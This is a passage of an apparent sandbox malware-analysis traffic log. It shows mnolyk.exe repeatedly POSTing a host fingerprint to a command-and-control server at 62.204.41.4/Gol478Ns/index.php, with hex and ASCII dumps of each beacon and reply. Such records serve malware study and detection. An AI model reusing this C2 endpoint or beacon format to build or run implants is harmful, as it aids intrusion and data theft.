                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:22.219158888 CET | 410 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      296 | 192.168.2.7 | 49991 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:22.396521091 CET | 411 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:22.459316969 CET | kBytes transferred: 411 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 297 | Source IP: 192.168.2.7 | Source Port: 49992 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:22.643208981 CET | kBytes transferred: 412 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:22.707648039 CET | kBytes transferred: 412 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 298 | Source IP: 192.168.2.7 | Source Port: 49993 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:22.893784046 CET | kBytes transferred: 413 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:22.958950043 CET | kBytes transferred: 413 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 299 | Source IP: 192.168.2.7 | Source Port: 49994 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:23.133002996 CET | kBytes transferred: 414 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:23.197545052 CET | kBytes transferred: 414 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49697 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:07:01.357866049 CET | kBytes transferred: 11 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:07:01.422851086 CET | kBytes transferred: 25 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 30 | Source IP: 192.168.2.7 | Source Port: 49724 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:07:08.827018976 CET | kBytes transferred: 134 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:07:08.890192986 CET | kBytes transferred: 134 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 300 | Source IP: 192.168.2.7 | Source Port: 49995 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:23.383016109 CET | kBytes transferred: 415 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:23.447137117 CET | kBytes transferred: 415 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 301 | Source IP: 192.168.2.7 | Source Port: 49996 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:23.620454073 CET | kBytes transferred: 416 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:23.682626009 CET | kBytes transferred: 416 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 302 | Source IP: 192.168.2.7 | Source Port: 49997 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:23.882400990 CET | kBytes transferred: 417 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:23.947484970 CET | kBytes transferred: 417 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 303 | Source IP: 192.168.2.7 | Source Port: 49998 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:24.116920948 CET | kBytes transferred: 418 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:24.179281950 CET | kBytes transferred: 418 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 304 | Source IP: 192.168.2.7 | Source Port: 49999 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:24.351918936 CET | kBytes transferred: 419 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:24.415993929 CET | kBytes transferred: 419 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 305 | Source IP: 192.168.2.7 | Source Port: 50000 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:24.592011929 CET | kBytes transferred: 420 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:24.655093908 CET | kBytes transferred: 420 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 306 | Source IP: 192.168.2.7 | Source Port: 50001 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:24.834270000 CET | kBytes transferred: 421 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:24.897998095 CET | kBytes transferred: 421 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 307 | Source IP: 192.168.2.7 | Source Port: 50002 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:25.080418110 CET | kBytes transferred: 422 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 7, 2023 23:08:25.143611908 CET | kBytes transferred: 422 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 308 | Source IP: 192.168.2.7 | Source Port: 50003 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 7, 2023 23:08:25.325124979 CET | kBytes transferred: 423 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.388860941 CET | 423 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      309 | 192.168.2.7 | 50004 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:25.569822073 CET | 424 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.633472919 CET | 424 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      31 | 192.168.2.7 | 49725 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:09.061494112 CET | 135 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.126104116 CET | 135 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      310 | 192.168.2.7 | 50005 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:25.803186893 CET | 425 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
